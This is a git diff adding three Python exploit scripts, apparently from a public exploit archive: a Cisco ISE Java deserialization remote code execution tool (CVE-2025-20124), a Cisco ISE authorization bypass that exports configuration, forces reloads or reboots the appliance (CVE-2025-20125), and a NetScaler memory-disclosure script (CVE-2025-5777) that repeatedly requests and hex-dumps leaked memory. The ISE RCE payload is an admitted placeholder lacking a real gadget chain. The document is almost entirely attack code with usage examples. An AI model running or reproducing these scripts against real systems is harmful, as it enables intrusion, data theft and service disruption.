CERTCC
diff --git a/‎exploits/multiple/remote/52396.py‎
Lines changed: 110 additions & 0 deletions b/‎exploits/multiple/remote/52396.py‎
Lines changed: 110 additions & 0 deletions
diff --git a/‎exploits/multiple/remote/52397.py‎
Lines changed: 176 additions & 0 deletions b/‎exploits/multiple/remote/52397.py‎
Lines changed: 176 additions & 0 deletions
diff --git a/‎exploits/multiple/remote/52401.py‎
Lines changed: 89 additions & 0 deletions b/‎exploits/multiple/remote/52401.py‎
Lines changed: 89 additions & 0 deletions
@@ -0,0 +1,110 @@
+# Exploit Title: Cisco ISE 3.0 - Remote Code Execution (RCE)
+# Exploit Author: @ibrahimsql ibrahimsql.com
+# Exploit Author's github: https://github.com/ibrahmsql
+# Description: Cisco ISE API Java Deserialization RCE
+# CVE: CVE-2025-20124
+# Vendor Homepage: https://www.cisco.com/
+# Requirements: requests>=2.25.0, urllib3>=1.26.0
+# Usage: python3 CVE-2025-20124.py --url https://ise.target.com --session TOKEN --cmd "id"
+
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+
+import requests
+import sys
+import argparse
+import base64
+import urllib3
+urllib3.disable_warnings()
+
+def banner():
+    print(r"""
+_________ .__
+\_   ___ \|__| ______ ____  ____
+/    \  \/|  |/  ___// ___\/  _ \
+\     \___|  |\___ \\  \__(  <_> )
+ \______  /__/____  >\___  >____/
+        \/        \/     \/
+
+Cisco ISE Java Deserialization RCE
+CVE-2025-20124
+Author: ibrahmsql | github.com/ibrahmsql
+""")
+
+def build_serialize_payload(cmd):
+    """
+    Java deserialization payload builder
+    """
+    java_cmd = cmd.replace('"', '\\"')
+    # Placeholder serialization - gerçek exploit için gadget chain gerekli
+    payload = f'\xac\xed\x00\x05sr\x00...ExecGadget...execute("{java_cmd}")'
+    return base64.b64encode(payload.encode()).decode()
+
+def exploit_deserialization(base_url, session_token, cmd):
+    """
+    CVE-2025-20124: Java Deserialization RCE
+    """
+    endpoint = f"{base_url}/api/v1/admin/deserializer"
+    headers = {
+        "Cookie": f"ISESSIONID={session_token}",
+        "Content-Type": "application/json",
+        "User-Agent": "Mozilla/5.0 (compatible; ISE-Exploit)"
+    }
+
+    payload = build_serialize_payload(cmd)
+    data = {"object": payload}
+
+    print(f"[+] Target: {base_url}")
+    print(f"[+] Endpoint: {endpoint}")
+    print(f"[+] Command: {cmd}")
+    print(f"[+] Sending deserialization payload...")
+
+    try:
+        r = requests.post(endpoint, json=data, headers=headers, verify=False, timeout=10)
+
+        if r.status_code == 200:
+            print("[+] Payload successfully sent!")
+            print("[+] Command possibly executed!")
+            if r.text:
+                print(f"[+] Response: {r.text[:500]}")
+        elif r.status_code == 401:
+            print("[-] Authentication failed - invalid session token")
+        elif r.status_code == 403:
+            print("[-] Access denied - insufficient privileges")
+        elif r.status_code == 404:
+            print("[-] Endpoint not found - target may not be vulnerable")
+        else:
+            print(f"[-] Unexpected response: {r.status_code}")
+            print(f"[-] Response: {r.text[:200]}")
+
+    except requests.exceptions.RequestException as e:
+        print(f"[-] Request failed: {e}")
+
+def main():
+    parser = argparse.ArgumentParser(
+        description="CVE-2025-20124 - Cisco ISE Java Deserialization RCE",
+        formatter_class=argparse.RawDescriptionHelpFormatter,
+        epilog="""
+Examples:
+  python3 CVE-2025-20124.py --url https://ise.company.com --session ABCD1234 --cmd "id"
+  python3 CVE-2025-20124.py --url https://10.0.0.1:9060 --session TOKEN123 --cmd "whoami"
+        """
+    )
+
+    parser.add_argument("--url", required=True, help="Base URL of Cisco ISE appliance")
+    parser.add_argument("--session", required=True, help="Authenticated ISE session token")
+    parser.add_argument("--cmd", required=True, help="Command to execute via deserialization")
+
+    args = parser.parse_args()
+
+    banner()
+
+    # URL validation
+    if not args.url.startswith(('http://', 'https://')):
+        print("[-] URL must start with http:// or https://")
+        sys.exit(1)
+
+    exploit_deserialization(args.url, args.session, args.cmd)
+
+if __name__ == "__main__":
+    main()
@@ -0,0 +1,176 @@
+# Exploit Title: Cisco ISE 3.0 - Authorization Bypass
+# Exploit Author: @ibrahimsql ibrahimsql.com
+# Exploit Author's github: https://github.com/ibrahmsql
+# Description: Cisco ISE API Authorization Bypass
+# CVE: CVE-2025-20125
+# Vendor Homepage: https://www.cisco.com/
+# Requirements: requests>=2.25.0, urllib3>=1.26.0
+# Usage: python3 CVE-2025-20125.py --url https://ise.target.com --session TOKEN --read
+
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+
+import requests
+import sys
+import argparse
+import urllib3
+urllib3.disable_warnings()
+
+def banner():
+    print(r"""
+  ___  ____  ___   ___  _____    ____  ___  ____
+ / __)(_  _)/ __) / __)(  _  )  (_  _)/ __)( ___)
+( (__  _)(_ \__ \( (__  )(_)(    _)(_ \__ \ )__)
+ \___)(____)(___/ \___)(_____)  (____)(___/(____)
+Cisco ISE Authorization Bypass
+CVE-2025-20125
+Author: ibrahmsql | github.com/ibrahmsql
+""")
+
+def exploit_config_read(base_url, session_token):
+    """
+    CVE-2025-20125: Read sensitive configuration
+    """
+    endpoint = f"{base_url}/api/v1/admin/config/export"
+    headers = {
+        "Cookie": f"ISESSIONID={session_token}",
+        "User-Agent": "Mozilla/5.0 (compatible; ISE-Exploit)"
+    }
+
+    print(f"[+] Attempting to read configuration from: {endpoint}")
+
+    try:
+        r = requests.get(endpoint, headers=headers, verify=False, timeout=10)
+
+        if r.status_code == 200:
+            print("[+] Configuration read successful!")
+            print(f"[+] Response length: {len(r.text)} bytes")
+            if r.text:
+                print(f"[+] Config preview: {r.text[:300]}...")
+            return True
+        else:
+            print(f"[-] Config read failed: {r.status_code}")
+            return False
+
+    except requests.exceptions.RequestException as e:
+        print(f"[-] Request failed: {e}")
+        return False
+
+def exploit_config_reload(base_url, session_token):
+    """
+    CVE-2025-20125: Force configuration reload
+    """
+    endpoint = f"{base_url}/api/v1/admin/reload"
+    headers = {
+        "Cookie": f"ISESSIONID={session_token}",
+        "Content-Type": "application/json",
+        "User-Agent": "Mozilla/5.0 (compatible; ISE-Exploit)"
+    }
+
+    print(f"[+] Sending config reload request to: {endpoint}")
+
+    try:
+        r = requests.post(endpoint, headers=headers, verify=False, timeout=10)
+
+        if r.status_code in (200, 204):
+            print("[+] Configuration reload accepted!")
+            print("[+] System may be restarting services...")
+            return True
+        elif r.status_code == 401:
+            print("[-] Authentication failed - invalid session token")
+        elif r.status_code == 403:
+            print("[-] Access denied - insufficient privileges")
+        else:
+            print(f"[-] Reload failed: {r.status_code}")
+
+        return False
+
+    except requests.exceptions.RequestException as e:
+        print(f"[-] Request failed: {e}")
+        return False
+
+def exploit_system_reboot(base_url, session_token):
+    """
+    CVE-2025-20125: Force system reboot
+    """
+    endpoint = f"{base_url}/api/v1/admin/reboot"
+    headers = {
+        "Cookie": f"ISESSIONID={session_token}",
+        "Content-Type": "application/json",
+        "User-Agent": "Mozilla/5.0 (compatible; ISE-Exploit)"
+    }
+
+    print(f"[+] Sending system reboot request to: {endpoint}")
+    print("[!] WARNING: This will reboot the target system!")
+
+    try:
+        r = requests.post(endpoint, headers=headers, verify=False, timeout=10)
+
+        if r.status_code in (200, 204):
+            print("[+] System reboot initiated!")
+            print("[+] Target system should be rebooting now...")
+            return True
+        else:
+            print(f"[-] Reboot failed: {r.status_code}")
+            return False
+
+    except requests.exceptions.RequestException as e:
+        print(f"[-] Request failed: {e}")
+        return False
+
+def main():
+    parser = argparse.ArgumentParser(
+        description="CVE-2025-20125 - Cisco ISE Authorization Bypass",
+        formatter_class=argparse.RawDescriptionHelpFormatter,
+        epilog="""
+Examples:
+  python3 CVE-2025-20125.py --url https://ise.company.com --session ABCD1234 --read
+  python3 CVE-2025-20125.py --url https://10.0.0.1:9060 --session TOKEN123 --reload
+  python3 CVE-2025-20125.py --url https://ise.target.com --session XYZ789 --reboot
+        """
+    )
+
+    parser.add_argument("--url", required=True, help="Base URL of Cisco ISE appliance")
+    parser.add_argument("--session", required=True, help="Authenticated ISE session token")
+    parser.add_argument("--read", action="store_true", help="Read sensitive configuration")
+    parser.add_argument("--reload", action="store_true", help="Force configuration reload")
+    parser.add_argument("--reboot", action="store_true", help="Force system reboot")
+
+    args = parser.parse_args()
+
+    banner()
+
+    # URL validation
+    if not args.url.startswith(('http://', 'https://')):
+        print("[-] URL must start with http:// or https://")
+        sys.exit(1)
+
+    # At least one action must be specified
+    if not any([args.read, args.reload, args.reboot]):
+        print("[-] Specify at least one action: --read, --reload, or --reboot")
+        sys.exit(1)
+
+    success = False
+
+    if args.read:
+        success |= exploit_config_read(args.url, args.session)
+
+    if args.reload:
+        success |= exploit_config_reload(args.url, args.session)
+
+    if args.reboot:
+        # Confirm reboot action
+        confirm = input("[!] Are you sure you want to reboot the target? (y/N): ")
+        if confirm.lower() in ['y', 'yes']:
+            success |= exploit_system_reboot(args.url, args.session)
+        else:
+            print("[-] Reboot cancelled by user")
+
+    if success:
+        print("\n[+] At least one exploit succeeded!")
+    else:
+        print("\n[-] All exploits failed")
+        sys.exit(1)
+
+if __name__ == "__main__":
+    main()
@@ -0,0 +1,89 @@
+# Exploit Title: Citrix NetScaler ADC/Gateway 14.1 - Memory Disclosure
+# Exploit Author: Yesith Alvarez
+# Vendor Homepage: hhttps://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX693420
+# CVE: CVE-2025-5777
+# Link: https://github.com/yealvarez/CVE/blob/main/CVE-2025-5777/exploit.py
+
+import re
+import sys
+import warnings
+import requests
+from time import sleep
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+
+
+def title():
+    print(r'''
+  ______     _______     ____   ___ ____  ____       ____ _____ _____ _____
+ / ___\ \   / / ____|   |___ \ / _ \___ \| ___|     | ___|___  |___  |___  |
+| |    \ \ / /|  _| _____ __) | | | |__) |___ \ ____|___ \  / /   / /   / /
+| |___  \ V / | |__|_____/ __/| |_| / __/ ___) |_____|__) |/ /   / /   / /
+ \____|  \_/  |_____|   |_____|\___/_____|____/     |____//_/   /_/   /_/
+
+[+] CitrixBleed - Memory Disclosure (Out-of-Bounds Read)
+[+] Author: Yesith Alvarez
+[+] Github: https://github.com/yealvarez
+[+] Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
+[+] Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2025-5777/exploit.py
+    ''')
+
+
+def print_hex(data: bytes):
+    for i in range(0, len(data), 16):
+        chunk = data[i:i+16]
+        hex_part = " ".join(f"{b:02X}" for b in chunk)
+        ascii_part = "".join(chr(b) if 32 <= b <= 126 else "." for b in chunk)
+        print("{:08X}".format(i) + "  " + "{:<47}".format(hex_part) + "  " + ascii_part)
+
+def extraction(blob: bytes) -> bytes | None:
+    OpenInitialValue = "<InitialValue>".encode("utf-8")
+    closenitialValue = "</InitialValue>".encode("utf-8")
+    matched = "(.*?)".encode("utf-8")
+    extract = re.compile(re.escape(OpenInitialValue) + matched  + re.escape(closenitialValue),flags=re.DOTALL | re.IGNORECASE)
+    m = extract.search(blob)
+    return None if m is None else m.group(1)
+
+
+def exploit(target: str):
+    url = "https://"+target+"/p/u/doAuthentication.do"
+
+    headers = {
+    "Content-Type": "application/x-www-form-urlencoded",
+    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"
+    }
+
+    try:
+        resp = requests.post(
+            url,
+            data="login".encode("utf-8"),
+            headers=headers,
+            timeout=15,
+            verify=False,
+        )
+        resp.raise_for_status()
+    except Exception as e:
+        print("["+target+"] Error No Vulnerable: " + str(e))
+        return
+
+    binary = extraction(resp.content)
+    if binary is None:
+        print("["+target+"] Connection Error ")
+        return
+    print("\n[+] Captured "+str(len(binary))+" bytes from the Target ["+target+"]:\n")
+    print_hex(binary)
+
+if __name__ == '__main__':
+    warnings.simplefilter("ignore", InsecureRequestWarning)
+    title()
+    if len(sys.argv) < 2:
+        print('[+] USAGE: python3'+sys.argv[0]+' <target.host>\n')
+        print('[+] Example: python3'+sys.argv[0]+' 10.10.10.10\n')
+        sys.exit(0)
+    else:
+        target = sys.argv[1]
+        try:
+            while True:
+                exploit(target)
+
+        except KeyboardInterrupt:
+            print("\n[+] Stopped by user.")